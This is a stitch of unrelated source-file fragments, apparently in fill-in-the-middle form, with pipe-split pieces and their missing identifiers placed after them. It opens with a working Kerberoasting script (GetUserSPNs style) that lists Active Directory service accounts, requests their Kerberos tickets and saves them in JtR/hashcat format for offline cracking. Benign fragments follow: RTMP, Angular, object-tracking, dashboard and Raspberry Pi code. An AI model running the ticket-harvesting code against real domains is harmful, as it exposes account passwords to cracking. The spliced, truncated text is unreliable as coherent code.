# Exception here, setting verifyConstraints to False so pyasn1 doesn't warn about incompatible tags
searchFilter['and'].setComponentByPosition(2,and2, verifyConstraints=False)
if self.__requestUser is not None:
#(sAMAccountName:=userSuppliedName)
logging.info('Gathering data for user %s' % self.__requestUser)
and3 = ldapasn1.EqualityMatch()
and3['attributeDesc'] = ldapasn1.AttributeDescription('sAMAccountName')
and3['assertionValue'] = ldapasn1.AssertionValue(self.__requestUser)
# searchFilter['and'][3] = and3
# Exception here, setting verifyConstraints to False so pyasn1 doesn't warn about incompatible tags
searchFilter['and'].setComponentByPosition(3, and3, verifyConstraints=False)
try:
resp = ldapConnection.search(searchFilter=searchFilter,
attributes=['servicePrincipalName', 'sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=999)
except ldap.LDAPSearchError, e:
if e.getErrorString().find('sizeLimitExceeded') >= 0: | logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
raise
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if not isinstance(item, ldapasn1.SearchResultEntry):
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
SPNs = []
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if attribute['type'] == 'sAMAccountName':
if str(attribute['vals'][0]).endswith('$') is False:
# User Account
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif attribute['type'] == 'userAccountControl':
userAccountControl = str(attribute['vals'][0])
elif attribute['type'] == 'memberOf':
memberOf = str(attribute['vals'][0])
elif attribute['type'] == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif attribute['type'] == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif attribute['type'] == 'servicePrincipalName':
for spn in attribute['vals']:
SPNs.append(str(spn))
if mustCommit is True:
if int(userAccountControl) & UF_ACCOUNTDISABLE:
logging.debug('Bypassing disabled account %s ' % sAMAccountName)
else:
for spn in SPNs:
answers.append([spn, sAMAccountName, memberOf, pwdLastSet, lastLogon])
except Exception, e:
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
self.printTable(answers, header=[ "ServicePrincipalName", "Name", "MemberOf", "PasswordLastSet", "LastLogon"])
print '\n\n'
if self.__requestTGS is True or self.__requestUser is not None:
# Let's get unique user names and a SPN to request a TGS for
users = dict( (vals[1], vals[0]) for vals in answers)
# Get a TGT for the current user
TGT = self.getTGT()
if self.__outputFileName is not None:
fd = open(self.__outputFileName, 'w+')
else:
fd = None
for user, SPN in users.iteritems():
try:
serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain,
self.__kdcHost,
TGT['KDC_REP'], TGT['cipher'],
TGT['sessionKey'])
self.outputTGS(tgs, oldSessionKey, sessionKey, user, SPN, fd)
except Exception, e:
logging.error(str(e))
if fd is not None:
fd.close()
else:
print "No entries found!"
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print version.BANNER
parser = argparse.ArgumentParser(add_help = True, description = "Queries target domain for SPNs that are running "
"under a user account")
parser.add_argument('target', action='store', help='domain/username[:password]')
parser.add_argument('-request', action='store_true', default=False, help='Requests TGS for users and output them '
'in JtR/hashcat format (default False)')
parser.add_argument('-request-user', action='store', metavar='username', help='Requests TGS for the SPN associated '
'to the user specified (just the username, no domain needed)')
parser.add_argument('-save', action='store_true', default=False, help='Saves TGS requested to disk. Format is '
'<username>.ccache. Auto selects -request')
parser.add_argument('-outputfile', action='store',
help='Output filename to write ciphers in JtR/hashcat format')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store', metavar = "ip address", help='IP Address of the domain controller. If '
'omitted it will use the domain part (FQDN) '
'specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
# This is because I'm lazy with regex
# ToDo: We need to change the regex to fulfill domain/username[:password]
targetParam = options.target+'@'
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(targetParam).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
if options.save is True or options.outputfile is not None:
options.request = True
try:
executer = GetUserSPNs(username, password, domain, options)
executer.run()
except Exception, e:
#import traceback
#print traceback.print_exc()
print str(e) | |
video_data.rs | use errors::{MessageDeserializationError, MessageSerializationError};
use rtmp_message::{RtmpMessage, RawRtmpMessage};
pub fn serialize(bytes: Vec<u8>) -> Result<RawRtmpMessage, MessageSerializationError> {
Ok(RawRtmpMessage{
data: bytes,
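// Message type ID 9 identifies video data in the RTMP specification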
type_id: 9
})
}
pub fn deserialize(data: Vec<u8>) -> Result<RtmpMessage, MessageDeserializationError> {
Ok(RtmpMessage::VideoData {
data: data
})
}
#[cfg(test)]
mod tests {
use rtmp_message::RtmpMessage; |
#[test]
fn can_serialize_message() {
let message = RtmpMessage::VideoData { data: vec![1,2,3,4] };
let expected = vec![1,2,3,4];
let raw_message = message.serialize().unwrap();
assert_eq!(raw_message.data, expected);
assert_eq!(raw_message.type_id, 9);
}
#[test]
fn can_deserialize_message() {
let data = vec![1,2,3,4];
let expected = RtmpMessage::VideoData { data: vec![1,2,3,4] };
let result = RtmpMessage::deserialize(data, 9).unwrap();
assert_eq!(result, expected);
}
} | |
IDocumentRepository.ts | /*---------------------------------------------------------------------------------------------
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See LICENSE.md in the project root for license information.
*--------------------------------------------------------------------------------------------*/
export interface IDocumentRepository {
readonly namePrefix: string;
readonly itemName: string;
readonly itemKind: string;
readonly extension: string;
| readContent(): Promise<{ content: any, etag?: string } | undefined>;
updateContent(content: any, etag?: string): Promise<void>;
} |
|
list.component.ts | import {LoginService} from './../../services/login.service';
import {Component, OnInit} from '@angular/core';
import {Endpoint} from '../../models/endpoint';
import {EndpointService} from '../../services/endpoint.service';
@Component({
selector: 'app-list',
templateUrl: './list.component.html',
styleUrls: ['./list.component.css']
})
export class | implements OnInit {
endpoints: Endpoint[] = [];
isAdmin: boolean;
constructor(private endpointService: EndpointService, private loginService: LoginService) { }
ngOnInit(): void {
this.loadEndpoints();
this.isAdmin = this.loginService.getIsAdmin();
}
loadEndpoints(): void {
this.endpointService.list().subscribe(
data => {
this.endpoints = data;
},
err => console.log(err)
);
}
onDelete(id: number): void {
this.endpointService.delete(id).subscribe(
data => {
console.log(data);
this.loadEndpoints();
},
err => console.log(err)
);
}
}
| ListComponent |
matching.py | import numpy as np
import scipy
import scipy.sparse
from scipy.spatial.distance import cdist
import lap # 0.4.0
from cython_bbox import bbox_overlaps as bbox_ious
from . import kalman_filter
def merge_matches(m1, m2, shape):
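# Compose two partial matchings m1 (O->P) and m2 (P->Q) into an O->Q matching via a sparse
# boolean matrix product, reporting unmatched indices on both sides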
O,P,Q = shape
m1 = np.asarray(m1)
m2 = np.asarray(m2)
M1 = scipy.sparse.coo_matrix((np.ones(len(m1)), (m1[:, 0], m1[:, 1])), shape=(O, P))
M2 = scipy.sparse.coo_matrix((np.ones(len(m2)), (m2[:, 0], m2[:, 1])), shape=(P, Q))
mask = M1*M2
match = mask.nonzero()
match = list(zip(match[0], match[1]))
unmatched_O = tuple(set(range(O)) - set([i for i, j in match]))
unmatched_Q = tuple(set(range(Q)) - set([j for i, j in match]))
return match, unmatched_O, unmatched_Q
def linear_assignment(cost_matrix, thresh):
if cost_matrix.size == 0:
return np.empty((0, 2), dtype=int), tuple(range(cost_matrix.shape[0])), tuple(range(cost_matrix.shape[1]))
matches, unmatched_a, unmatched_b = [], [], []
cost, x, y = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh)
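# lapjv returns the total cost plus two index arrays: x[i] is the column assigned to row i
# and y[j] the row assigned to column j, with -1 for unassigned entries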
for ix, mx in enumerate(x):
if mx >= 0:
matches.append([ix, mx])
unmatched_a = np.where(x < 0)[0]
unmatched_b = np.where(y < 0)[0]
matches = np.asarray(matches)
return matches, unmatched_a, unmatched_b
def ious(atlbrs, btlbrs):
"""
Compute cost based on IoU
:type atlbrs: list[tlbr] | np.ndarray
:type btlbrs: list[tlbr] | np.ndarray
:rtype ious np.ndarray
"""
ious = np.zeros((len(atlbrs), len(btlbrs)), dtype=np.float64)
if ious.size == 0:
return ious
ious = bbox_ious(
np.ascontiguousarray(atlbrs, dtype=np.float64),
np.ascontiguousarray(btlbrs, dtype=np.float64)
)
return ious
def iou_distance(atracks, btracks):
"""
Compute cost based on IoU
:type atracks: list[STrack]
:type btracks: list[STrack]
:rtype cost_matrix np.ndarray
"""
if (len(atracks)>0 and isinstance(atracks[0], np.ndarray)) or (len(btracks) > 0 and isinstance(btracks[0], np.ndarray)):
atlbrs = atracks
btlbrs = btracks
else:
atlbrs = [track.tlbr for track in atracks]
btlbrs = [track.tlbr for track in btracks]
_ious = ious(atlbrs, btlbrs)
cost_matrix = 1 - _ious
return cost_matrix
def embedding_distance(tracks, detections, metric='cosine'):
"""
:param tracks: list[STrack]
:param detections: list[BaseTrack]
:param metric:
:return: cost_matrix np.ndarray
"""
cost_matrix = np.zeros((len(tracks), len(detections)), dtype=np.float64)
if cost_matrix.size == 0:
return cost_matrix
det_features = np.asarray([track.curr_feat for track in detections], dtype=np.float64)
track_features = np.asarray([track.smooth_feat for track in tracks], dtype=np.float64)
cost_matrix = np.maximum(0.0, cdist(track_features, det_features, metric)) # Normalized features
return cost_matrix
def | (kf, cost_matrix, tracks, detections, only_position=False, lambda_=0.98):
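# Gate the appearance cost matrix with Kalman motion information: candidates beyond the
# chi-square gating threshold become infeasible, and the remaining costs are blended with
# the Mahalanobis distance using lambda_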
if cost_matrix.size == 0:
return cost_matrix
gating_dim = 2 if only_position else 4
gating_threshold = kalman_filter.chi2inv95[gating_dim]
measurements = np.asarray([det.to_xyah() for det in detections])
for row, track in enumerate(tracks):
gating_distance = kf.gating_distance(
track.mean, track.covariance, measurements, only_position, metric='maha')
cost_matrix[row, gating_distance > gating_threshold] = np.inf
cost_matrix[row] = lambda_ * cost_matrix[row] + (1-lambda_)* gating_distance
return cost_matrix
| fuse_motion |
dashboard.js | /*!
Copyright (C) 2016 Google Inc.
Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
*/
// Initialize delegated event handlers
jQuery(function ($) {
window.natural_comparator = function (a, b) {
var i;
a = a.slug.toString();
b = b.slug.toString();
if (a === b) {
return 0;
}
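// Split the slugs at digit/non-digit boundaries so numeric runs can be compared as numbers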
a = a.replace(/(?=\D\d)(.)|(?=\d\D)(.)/g, '$1$2|').split('|');
b = b.replace(/(?=\D\d)(.)|(?=\d\D)(.)/g, '$1$2|').split('|');
for (i = 0; i < Math.max(a.length, b.length); i++) {
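// Number(x) === Number(x) is false only for NaN, so this branch runs when both chunks are numeric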
if (Number(a[i]) === Number(a[i]) && Number(b[i]) === Number(b[i])) {
if (Number(a[i]) < Number(b[i])) {
return -1;
}
if (Number(b[i]) < Number(a[i])) {
return 1;
}
} else {
if (a[i] < b[i]) {
return -1;
}
if (b[i] < a[i]) {
return 1;
}
}
}
return 0;
};
// Turn the arrow when tree node content is shown
$('body').on('click', '[data-toggle="collapse"]', function (e) {
var $this = $(this);
var $expander_container = $this.closest(':has(.expander, .enddot)');
var $expander = $expander_container.find('.expander').eq(0);
var $target = $($this.data('target'));
setTimeout(function () {
if ($target.hasClass('in')) {
$expander.addClass('in');
} else {
$expander.removeClass('in');
}
}, 100);
});
// After the modal template has loaded from the server, but before the
// data has loaded to populate into the body, show a spinner
$('body').on('loaded', '.modal.modal-slim, .modal.modal-wide', function (e) {
var spin = function () {
$(this).html(
$(new Spinner().spin().el)
.css({
width: '100px', height: '100px',
left: '50%', top: '50%',
zIndex: calculate_spinner_z_index
})
).one('loaded', function () {
$(this).find('.source').each(spin);
});
};
$(e.target).find('.modal-body .source').each(spin);
});
$('body').on('click', '[data-toggle="list-remove"]', function (e) {
e.preventDefault();
$(this).closest('li').remove();
});
$('body').on('click', '[data-toggle="list-select"]', function (e) {
var $this;
var $li;
var target;
var data;
e.preventDefault();
$this = $(this);
$li = $this.closest('li');
target = $li.closest('ul').data('list-target');
if (target) {
data = $.extend({}, $this.data('context') || {}, $this.data());
$(target).tmpl_mergeitems([data]);
}
});
});
// This is only used by import to redirect on successful import
// - this cannot use other response headers because it is proxied through
// an iframe to achieve AJAX file upload (using remoteipart)
jQuery(function ($) {
var submit_import = 'form.import input[type=submit]';
var file_select_elem = 'form.import input[type=file]';
function onSubmitClick(ev) {
if (typeof ev !== 'object') {
// sometimes browser triggers submit, not the user -> ignore
return;
}
if ($(this).hasClass('disabled') || $(file_select_elem).val() === '') {
if (ev) {
ev.preventDefault();
}
}
$(this).addClass('disabled');
}
function checkStatus(result, type, $btn) {
CMS.Models.BackgroundTask.findOne({id: result.id}, function (task) {
var msg = ($btn && $btn.val() == 'Upload and Review') ? $btn.val() : type;
var $container;
var jsonResult;
var headers;
var i;
if (task.status == 'Pending' || task.status == 'Running') {
$('body').trigger(
'ajax:flash',
{progress: msg + ' ' + task.status.toLowerCase() + '...'}
);
// Task has not finished yet, check again in a while:
setTimeout(function () {
checkStatus(result, type, $btn);
}, 3000);
} else if (task.status == 'Success') {
$container = $('#results-container');
if ($btn) {
$btn.removeClass('disabled');
}
// Check if redirect:
try {
jsonResult = $.parseJSON($(task.result.content).text());
if ('location' in jsonResult) {
GGRC.navigate(jsonResult.location);
return;
}
} catch (e) {}
// Check if file download (export):
if ('headers' in task.result) {
headers = task.result.headers;
for (i = 0; i < headers.length; i++) {
if (headers[i][0] == 'Content-Type' && headers[i][1] == 'text/csv') {
window.location.assign('/background_task/' + task.id);
}
}
}
$container.html(task.result.content);
$container.find('input[type=submit]').click(onSubmitClick);
if (msg === 'Upload and Review') {
// Don't display "Upload and Review successful." message;
// But kill progress message.
$('body').trigger('ajax:flash', {});
return;
}
$('body').trigger(
'ajax:flash',
{success: msg + ' successful.'}
);
} else if (task.status == 'Failure') {
if ($btn) {
$btn.removeClass('disabled');
}
$('body').trigger(
'ajax:flash',
{error: msg + ' failed.'}
);
}
});
}
$(submit_import).click(onSubmitClick); | // handler to initialize import upload button as disabled
$(submit_import).ready(function () {
$(submit_import).addClass('disabled');
});
$('body').on('ajax:success', 'form.import', function (e, data, status, xhr) {
var $btn = $('form.import .btn.disabled').first();
var result;
if (xhr.getResponseHeader('Content-Type') == 'application/json') {
result = $.parseJSON(data);
if ('location' in result) {
// Redirect
GGRC.navigate(result.location);
}
// Check if task has completed:
setTimeout(function () {
checkStatus(result, 'Import', $btn);
}, 500);
} else if ($btn) {
$btn.removeClass('disabled');
}
});
// change button to disabled when no file selected, and vice versa
$(file_select_elem).change(function (ev) {
if (this.value === '') {
$(submit_import).each(onSubmitClick);
} else {
$(submit_import).removeClass('disabled');
}
});
jQuery(function ($) {
$('body').on('ajax:success', 'form[data-remote][data-update-target]', function (e, data, status, xhr) {
var $container;
if (xhr.getResponseHeader('Content-Type') == 'text/html') {
$container = $($(this).data('update-target'));
$container.html(data);
$container.find('input[type=submit]').click(onSubmitClick);
}
});
});
});
jQuery(function ($) {
function refresh_page() {
setTimeout(can.proxy(window.location.reload, window.location), 10);
}
$('body').on('ajax:complete', '[data-ajax-complete="refresh"]', refresh_page);
});
jQuery(function ($) {
$('body').on('ajax:success', '#helpedit form', function (e, data, status, xhr) {
var $modal = $(this).closest('.modal');
$modal.find('.modal-header h1').html(data.help.title);
$modal.find('.modal-body .help-content').html(data.help.content);
$modal.find('.modal-body #helpedit').collapse('hide');
});
});
jQuery(function ($) {
// Used in object_list sidebars (References, People, Categories)
$('body').on('modal:success', '.js-list-container-title a', function (e, data) {
var $this = $(this);
var $title = $this.closest('.js-list-container-title');
var $span = $title.find('span');
var $expander = $title.find('.expander').eq(0);
$span.text('(' + (data.length || 0) + ')');
if (data.length > 0) {
$span.removeClass('no-object');
} else {
$span.addClass('no-object');
}
if (!$expander.hasClass('in')) {
$expander.click();
}
});
});
jQuery(function ($) {
function checkActive(notification_configs) {
var inputs = $('.notify-wrap').find('input');
var active_notifications = $.map(notification_configs, function (a) {
if (a.enable_flag) {
return a.notif_type;
}
});
$.map(inputs, function (input) {
// Handle the default case, in case notification objects are not set:
if (notification_configs.length === 0) {
input.checked = input.value === 'Email_Digest';
} else {
input.checked = active_notifications.indexOf(input.value) > -1;
}
});
}
function updateNotifications() {
CMS.Models.NotificationConfig.findActive().then(checkActive);
$('body').off('click', '.user-dropdown > .dropdown-toggle', updateNotifications);
}
$('body').on('click', '.user-dropdown > .dropdown-toggle', updateNotifications);
// Don't close the dropdown if clicked on checkbox
$('body').on('click', '.notify-wrap', function (ev) {
ev.stopPropagation();
});
$('body').on('click', 'input[name=notifications]', function (ev, el) {
var li = $(ev.target).closest('.notify-wrap');
var inputs = li.find('input');
var active = [];
var email_now = li.find('input[value="Email_Now"]');
var email_now_label = email_now.closest('label');
var email_digest = li.find('input[value="Email_Digest"]');
if (email_digest[0].checked) {
email_now_label.removeClass('disabled');
email_now.prop('disabled', false);
} else if (!email_digest[0].checked) {// uncheck email_now
email_now.prop('checked', false);
email_now_label.addClass('disabled');
}
inputs.prop('disabled', true);
active = $.map(inputs, function (input) {
if (input.checked) {
return input.value;
}
});
CMS.Models.NotificationConfig.setActive(active).always(function (response) {
email_digest.prop('disabled', false);
if (email_digest[0].checked) {
email_now.prop('disabled', false);
}
});
});
$('body').on('click', '.clear-display-settings', function (e) {
CMS.Models.DisplayPrefs.findAll().done(function (data) {
var destroys = [];
can.each(data, function (d) {
d.unbind('change'); // forget about listening to changes. we're going to refresh the page
destroys.push(d.resetPagePrefs());
});
$.when.apply($, destroys).done(function () {
GGRC.navigate();
});
});
})
.on('click', '.set-display-settings-default', function (e) {
var page_token = getPageToken();
CMS.Models.DisplayPrefs.findAll().done(function (data) {
var destroys = [];
can.each(data, function (d) {
d.unbind('change'); // forget about listening to changes. we're going to refresh the page
destroys.push(d.setPageAsDefault(page_token));
});
$.when.apply($, destroys).done(function () {
$('body').trigger(
'ajax:flash',
{success: 'Saved page layout as default for ' + (page_token === 'dashboard' ? 'dashboard' : page_token)}
);
});
});
});
});
// Make all external links open in new window.
jQuery(function ($) {
$('body').on('click', 'a[href]:not([target])', function (e) {
if (!e.isDefaultPrevented()) {
if (/^http/.test(this.protocol) && this.hostname !== window.location.hostname) {
e.preventDefault();
window.open(this.href);
}
}
});
});
function resize_areas(event, target_info_pin_height) {
var $window = $(window);
var $bar = $('.bar-v');
var $footer = $('.footer');
var $header = $('.header-content');
var $innerNav = $('.inner-nav');
var $lhnType = $('.lhn-type');
var $lhsHolder = $('.lhs-holder');
var $objectArea = $('.object-area');
var $pin = $('.pin-content');
var $topNav = $('.top-inner-nav');
var winHeight = $window.height();
var winWidth = $window.width();
var lhsHeight = winHeight - 180; // new ui
var footerMargin = lhsHeight + 130; // new UI
var internavHeight = object_area_height();
var internavWidth = $innerNav.width() || 0; // || 0 for pages without inner-nav
var lhsWidth = $lhsHolder.width();
var objectWidth = winWidth;
$lhnType.css('width', lhsWidth);
$lhsHolder.css('height', lhsHeight);
$bar.css('height', lhsHeight);
$footer.css('margin-top', footerMargin);
$innerNav.css('height', internavHeight);
$objectArea
.css('margin-left', internavWidth)
.css('height', internavHeight)
.css('width', objectWidth);
function object_area_height() {
var height = winHeight - not_main_elements_height();
var nav_pos = $topNav.css('top') ?
Number($topNav.css('top').replace('px', '')) :
0;
if (nav_pos < $header.height()) {
height -= $topNav.height();
}
return height;
}
function not_main_elements_height() {
var margins = [$objectArea.css('margin-top'), $objectArea.css('margin-bottom'),
$objectArea.css('padding-top'), $objectArea.css('padding-bottom')]
.map(function (margin) {
if (!margin) {
margin = '0';
}
return Number(margin.replace('px', ''));
})
.reduce(function (m, h) {
return m + h;
}, 0);
var pin_height = $.isNumeric(target_info_pin_height) ?
target_info_pin_height :
$pin.height();
// the 5 gives user peace of mind they've reached bottom
var UIHeight = [$topNav.height(), $header.height(),
$footer.height(),
margins, pin_height, 5]
.reduce(function (m, h) {
return m + h;
}, 0);
return UIHeight;
}
}
jQuery(function ($) {
// Footer expander animation helper
function expander(toggle, direction) {
var $this = $(toggle);
var $expander = $this.closest('div').find('.section-expander');
var out = direction === 'out';
var height = $expander.outerHeight();
var width = $expander.outerWidth();
var start = out ? 0 : width;
var end = out ? width : 0;
var duration = 500;
var clip;
if (out) {
$this.filter(':not(.section-sticky)').fadeOut(200);
}
// Check for intermediate animation
// Update the starting point and duration as appropriate
if ($expander.is(':animated')) {
$expander.stop();
clip = $expander.css('clip').match(/^rect\(([0-9.-]+)px,?\s+([0-9.-]+)px,?\s+([0-9.-]+)px,?\s+([0-9.-]+)px\)$/);
if (clip) {
// Start or end is always zero, so we can use some shortcuts
start = parseFloat(clip[2]);
duration = ~~((end ? end - start : start) / width * duration);
}
}
// Process animation
$expander.css({
display: 'inline-block',
marginRight: end + 'px',
clip: 'rect(0px, ' + start + 'px, ' + height + 'px, 0px)',
left: $this.is('.section-sticky') ? $this.outerWidth() : 0
}).animate({
marginRight: start + 'px'
}, {
duration: duration,
easing: 'easeInOutExpo',
step: function (now, fx) {
$(this).css('clip', 'rect(0px, ' + (width - now + (out ? start : end)) + 'px, ' + height + 'px, 0px)');
},
complete: function () {
if (!out) {
$this.filter(':not(.section-sticky)').fadeIn();
$(this).hide();
}
$(this).css({
marginRight: '0px',
clip: 'auto'
});
}
});
// Queue the reverse on mouseout
if (out) {
$this.closest('li').one('mouseleave', function () {
expander($this, 'in');
});
}
}
// Footer expander animations (verify that an expander exists)
$('body').on('mouseenter', '.section-add:has(+ .section-expander), .section-expander:visible:animated', function (e) {
var $this = $(this);
expander($this.hasClass('section-add') ? $this : $this.prev('.section-add'), 'out');
});
$('body').on('click', '.show-long', function (e) {
var $this = $(this);
var $descField = $this.closest('.span12').find('.tree-description');
$this.hide();
$descField.removeClass('short');
});
// show/hide audit lead and firm
$('body').on('mouseover', '.ui-autocomplete li a', function (e) {
var $this = $(this);
$this.addClass('active');
$this.closest('li').addClass('active');
});
$('body').on('mouseleave', '.ui-autocomplete li a', function (e) {
var $this = $(this);
$this.removeClass('active');
$this.closest('li').removeClass('active');
});
});
jQuery(window).on('load', resize_areas);
jQuery(window).on('resize', resize_areas); | |
rpi_test.go | // Copyright 2019 The Periph Authors. All rights reserved.
// Use of this source code is governed under the Apache License, Version 2.0
// that can be found in the LICENSE file.
package rpi
import (
"reflect"
"testing"
)
func TestParseRevision(t *testing.T) {
data := []struct {
v uint32
r revisionCode
}{
// https://www.raspberrypi.org/documentation/hardware/raspberrypi/revision-codes/README.md
// Old style
{0x2, newFormat | memory256MB | egoman | bcm2835 | board1B},
{0x3, newFormat | memory256MB | egoman | bcm2835 | board1B},
{0x4, newFormat | memory256MB | sonyUK | bcm2835 | board1B | 2},
{0x5, newFormat | memory256MB | bcm2835 | board1B | 2},
{0x6, newFormat | memory256MB | egoman | bcm2835 | board1B | 2},
{0x7, newFormat | memory256MB | egoman | bcm2835 | board1A | 2},
{0x8, newFormat | memory256MB | sonyUK | bcm2835 | board1A | 2},
{0x9, newFormat | memory256MB | bcm2835 | board1A | 2},
{0xd, newFormat | memory512MB | egoman | bcm2835 | board1B | 2},
{0xe, newFormat | memory512MB | sonyUK | bcm2835 | board1B | 2},
{0xf, newFormat | memory512MB | egoman | bcm2835 | board1B | 2},
{0x10, newFormat | memory512MB | sonyUK | bcm2835 | board1BPlus | 2},
{0x11, newFormat | memory512MB | sonyUK | bcm2835 | boardCM1},
{0x12, newFormat | memory256MB | sonyUK | bcm2835 | board1APlus | 1},
{0x13, newFormat | memory512MB | embest | bcm2835 | board1BPlus | 2},
{0x14, newFormat | memory512MB | embest | bcm2835 | boardCM1},
{0x15, newFormat | memory256MB | embest | bcm2835 | board1APlus | 1},
// Test warranty bit
{0x1000015, warrantyVoid | newFormat | memory256MB | embest | bcm2835 | board1APlus | 1},
// New style
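// New-style revision codes are bit-packed: memory size in bits 20-22, manufacturer in 16-19,
// processor in 12-15, board type in 4-11 and board revision in 0-3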
{0x900021, newFormat | memory512MB | sonyUK | bcm2835 | board1APlus | 1},
{0x900032, newFormat | memory512MB | sonyUK | bcm2835 | board1BPlus | 2},
{0x900092, newFormat | memory512MB | sonyUK | bcm2835 | boardZero | 2},
{0x900093, newFormat | memory512MB | sonyUK | bcm2835 | boardZero | 3},
{0x9000c1, newFormat | memory512MB | sonyUK | bcm2835 | boardZeroW | 1},
{0x9020e0, newFormat | memory512MB | sonyUK | bcm2837 | board3APlus},
{0x920092, newFormat | memory512MB | embest | bcm2835 | boardZero | 2},
{0x920093, newFormat | memory512MB | embest | bcm2835 | boardZero | 3},
{0x900061, newFormat | memory512MB | sonyUK | bcm2835 | boardCM1 | 1},
{0xa01040, newFormat | memory1GB | sonyUK | bcm2836 | board2B},
{0xa01041, newFormat | memory1GB | sonyUK | bcm2836 | board2B | 1},
{0xa02082, newFormat | memory1GB | sonyUK | bcm2837 | board3B | 2},
{0xa020a0, newFormat | memory1GB | sonyUK | bcm2837 | boardCM3},
{0xa020d3, newFormat | memory1GB | sonyUK | bcm2837 | board3BPlus | 3},
{0xa21041, newFormat | memory1GB | embest | bcm2836 | board2B | 1},
{0xa22042, newFormat | memory1GB | embest | bcm2837 | board2B | 2},
{0xa22082, newFormat | memory1GB | embest | bcm2837 | board3B | 2},
{0xa220a0, newFormat | memory1GB | embest | bcm2837 | boardCM3},
{0xa32082, newFormat | memory1GB | sonyJapan | bcm2837 | board3B | 2},
{0xa52082, newFormat | memory1GB | stadium | bcm2837 | board3B | 2},
{0xa22083, newFormat | memory1GB | embest | bcm2837 | board3B | 3},
{0xa02100, newFormat | memory1GB | sonyUK | bcm2837 | boardCM3Plus},
{0xa03111, newFormat | memory1GB | sonyUK | bcm2711 | board4B | 1},
{0xb03111, newFormat | memory2GB | sonyUK | bcm2711 | board4B | 1},
{0xc03111, newFormat | memory4GB | sonyUK | bcm2711 | board4B | 1},
{0xb03112, newFormat | memory2GB | sonyUK | bcm2711 | board4B | 2},
{0xc03112, newFormat | memory4GB | sonyUK | bcm2711 | board4B | 2},
{0xb03114, newFormat | memory2GB | sonyUK | bcm2711 | board4B | 4},
{0xc03114, newFormat | memory4GB | sonyUK | bcm2711 | board4B | 4},
{0xd03114, newFormat | memory8GB | sonyUK | bcm2711 | board4B | 4},
{0xc03130, newFormat | memory4GB | sonyUK | bcm2711 | board400},
}
for i, line := range data {
r, err := parseRevision(line.v)
if err != nil {
t.Fatalf("#%d: unexpected failure: %v", i, err)
}
if line.r != r {
t.Fatalf("#%d: unexpected: %#x != %#x", i, line.r, r)
}
}
}
func TestParseRevisionErr(t *testing.T) |
func TestFeaturesInit(t *testing.T) {
data := []struct {
v uint32
f features
}{
{0x2, features{hdrP1P26: true, hdrAudio: true}}, // board1B
{0x3, features{hdrP1P26: true, hdrAudio: true}}, // board1B
{0x4, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1B
{0x5, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1B
{0x6, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1B
{0x7, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1A
{0x8, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1A
{0x9, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1A
{0xd, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1B
{0xe, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1B
{0xf, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1B
{0x10, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board1BPlus
{0x11, features{}}, // boardCM1
{0x12, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board1APlus
{0x13, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board1BPlus
{0x14, features{}}, // boardCM1
{0x15, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board1APlus
{0x900092, features{hdrP1P40: true, hdrHDMI: true}}, // boardZero
{0x900093, features{hdrP1P40: true, hdrHDMI: true}}, // boardZero
